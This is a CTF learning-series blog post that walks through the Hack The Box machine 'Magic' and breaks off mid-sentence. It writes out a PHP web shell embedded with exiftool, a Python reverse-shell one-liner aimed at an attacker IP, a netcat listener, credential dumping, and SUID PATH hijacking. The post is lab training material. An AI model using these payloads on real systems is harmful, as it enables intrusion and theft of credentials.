This CTF Learn Series, will be tips and tricks I learned during CTFs.
So, that being said, today I pwned my first Hack The Box machine - Magic!
Thanks to Fahmi's Magic Walkthrough!
So, I was presented with a webserver with 2 ports in use. Started to do recon on the website and found a login panel - bypassed the login using simple SQL injection.
An image upload interface greeted me, and is ready to accept png, jpg and gif formats ONLY. There was a chance to get access using a php-reverse-shell but no, it did not accept any .php format or even I tried .php.png, bad luck! This was the time for me to learn this first trick
- Using this tool - exiftool - we can view the metadata of an image and we could use the same to alter it as well.
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']);?>' image.png
What this command does is, it alters the Comment parameter of the image.
As we have used, $_GET we could send the data through the url in cmd parameter
...image.php.png?cmd=<any shell command> and this will run the shell commands and give the output in the browser.
Checked if python is available or not, it was not but python3 was!
Then used the python one liner reverse shell to get access to the shell. Passed the one liner through
cmd parameter and started listening on some port
nc -nlvp 1234.
Python One Liner Reverse Shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Did a bit recon as
www-data, found credentials of mysql database which lead to mysqldump of user's credentials.
Next step was privilege escalation to root!
linpeas.sh and found out some SUID binaries, and one specific that looked interesting was
sysinfo which was linked to
Time for the next lesson!
After doing some recon, we knew that when
sysinfo was running a service called
lshw and therefore if we could run same command before
sysinfo, we could possibly achieve our task.
Created a new file in
/tmp/cardinal/lshw and put that python reverse shell in it and made it executable.
What we have to do now, is that specify this location in the PATH variable.
And then we came to our terminal and started the reverse shell and then in the user's terminal executed